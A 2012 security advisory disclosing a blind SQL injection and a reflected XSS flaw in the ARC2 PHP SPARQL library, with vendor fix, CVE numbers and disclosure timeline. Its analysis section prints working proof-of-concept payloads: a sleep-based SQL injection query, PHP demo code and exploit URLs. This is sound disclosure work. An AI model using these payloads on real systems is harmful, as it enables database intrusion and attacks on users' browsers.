CVE-2012-5873: ush.it - a beautiful place

November 22, 2012 at 11:34 am - Filed under Hacks - 1408 words, reading time ~4 minutes - Permalink - Comments

Simone “negator” Onofri and Luca “beinux3” Napolitano found multiple issues in ARC2, providing RDF and SPARQL functionalities to PHP applications and working with MySQL as backend. Found vulnerabilities include SQL Injection and XSS.

ARC v2011-12-01 Multiple vulnerabilities

Name ARC2 v2011-12-01 Multiple vulnerabilities Systems Affected ARC2 v2011-12-01 Severity High Impact High 10/10, vector (AV:N/AC:L/Au:N/C:C/I:C/A:C) Vendor https://github.com/semsol/arc2 Advisory http://www.ush.it/team/negator/hack-arc_2011-12-01/adv.txt Author Simone “negator” Onofri, Luca “beinux3” Napolitano Date 20121123

I. BACKGROUND

ARC is a flexible RDF system for semantic web and PHP practitioners. It’s free, open-source, easy to use, and runs in most web server environments.

II. DESCRIPTION

ARC version v2011-12-01 and lower is affected by Blind SQL Injection and Cross Site Scripting vulnerabilities, in particular the SPARQL+ Endpoint.

III. ANALYSIS

Summary: A) Blind SQL Injection (SQLI) Vulnerability B) Reflected Cross Site Scripting (XSS) Vulnerability

A) Blind SQL Injection (SQLI) Vulnerability

A blind SQL Injection vulnerability exists in ARC version v2011-12-01.

ARC stores triples into a mySQL database and uses a translator from SPARQL and SQL. To improve debugging of the application the developer has included comments that contain the query string value. It’s possible to Inject SQL commands on these comments if data passed is into a SPARQL WHERE clause.

In the "getTriplePatternSQL()" function, “ARC2_StoreSelectQueryHandler .php” file, the query sent to MySQL is automatically debugged (without the ability to conditionally disable such feature) plugging comments containing the pattern’s “S P O” (Subject, Predicate, Object; the semantic web triple concept) values.

SPARQL Query:

–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–

PREFIX iam: http://x SELECT * WHERE { ?user iam:user “lol*/ OR (SELECT sleep(5))=1–” . } LIMIT 100

–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–

Actual MySQL Query:

–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–

SELECT T_0_0_0.s AS `user`, T_0_0_0.s_type AS `user type` FROM arc_tests_triple T_0_0_0 WHERE (T_0_0_0.p = 0) /*FIX-IT http://xuser */ AND (T_0_0_0.o = 0) /*FIX-IT lol*/ OR (SELECT sleep(5))=1-- */ LIMIT 0,100

–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–

What follows is a demo exploitation of the SPARQL Endpoint.

–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–

$query = 'PREFIX iam: http://x SELECT * WHERE { ?user iam:user "lol*/ OR (SELECT sleep(5))=1–".?password iam:hasPassw ord “password” . } LIMIT 100’; $store->setUp(); $store->query($query, ‘rows’)

–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–

It’s possible to exploit the issue in the standard blind way, for example using TRUE/FALSE statements (tautology).

–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–

http://www.example.com/end_point.php?query=PREFIX+iam%3A+<http%3A%2F%2Fx

%0D%0ASELECT+*+WHERE+%7B%0D%0A+++%3Fuser+iam%3Auser+"lol*%2F+OR+%28SELE CT+sleep%285%29%29%3D1–".%0D%0A%7D%0D%0ALIMIT+1&output=&jsonp=&key=&sho w_inline=1

–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–

The CVSS v2 score for Blind SQL Injection is: High 10/10, vector (AV:N/AC:L/Au:N/C:C/I:C/A:C).

B) Reflected Cross Site Scripting (XSS) Vulnerability

A Reflected Cross Site Scripting vulnerability exists in ARC version v2011-12-01 endpoint function.

The GET variable “query” is reflected in page without proper encoding when the “output” option is set to "htmltab".

–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–

<div class="results"> Could not properly handle “<script src=/lol.it/x><script>” in ARC2_SPARQLPlusParser </div>

–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–

PoC URL that exploits this vulnerability:

–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–

http://www.example.com/end_point.php?query=<script+src%3D%2Flol.it%2Fx>< script>&output=htmltab&jsonp=&key=&show_inline=1

–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–

The CVSS v2 score for Reflected Cross Site Scripting is Medium 4.3/10, vector (AV:N/AC:M/Au:N/C:N/I:P/A:N).

IV. DETECTION

ARC2 v2011-12-01 and possibly earlier versions are vulnerable.

V. WORKAROUND

Update ARC2 to the latest release or manually fix the “ARC2_StoreEndpoin t.php” and other files as described by the commit ID 0a39922edaf6a72c5af 60aaeaff7bc4e92a6d342.

https://github.com/semsol/arc2/commit/0a39922edaf6a72c5af60aaeaff7bc4e92a6d342

VI. VENDOR RESPONSE

Issues fixed in GIT commit 0a39922.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned:

• The name CVE-2012-5872 to Blind SQL Injection Vulnerability.
• The name CVE-2012-5873 to Reflected Cross Site Scripting Vulnerability.

This is a candidate for inclusion in the CVE list http://cve.mitre.org, which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

20121110 Bug discovered 20121110 Vendor contacted 20121111 Vendor responded 20121111 Vendor fixed SQLI 20121115 Vendor fixed XSS 20121115 Advisory release scheduled for 20121123 20121123 Advisory released

IX. REFERENCES

Well you know what SQLi and XSS are, right?

X. CREDIT

Simone “negator” Onofri is credited for the discovery of this vulnerability.

Luca “beinux3” Napolitano is credited for the discovery of this vulnerability.

Thanks to Francesco “ascii” Ongaro for revision and fine editing.

Simone “negator” Onofri web site: http://simone.onofri.net/ mail: simone AT onofri DOT net

Luca “beinux3” Napolitano web site:http://www.network-tsunami.com/ mail: beinux3 AT gmail DOT com

Francesco “ascii” Ongaro web site: http://www.ush.it/ mail: ascii AT ush DOT it

XI. LEGAL NOTICES

Copyright © 2012

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without mine express written consent. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.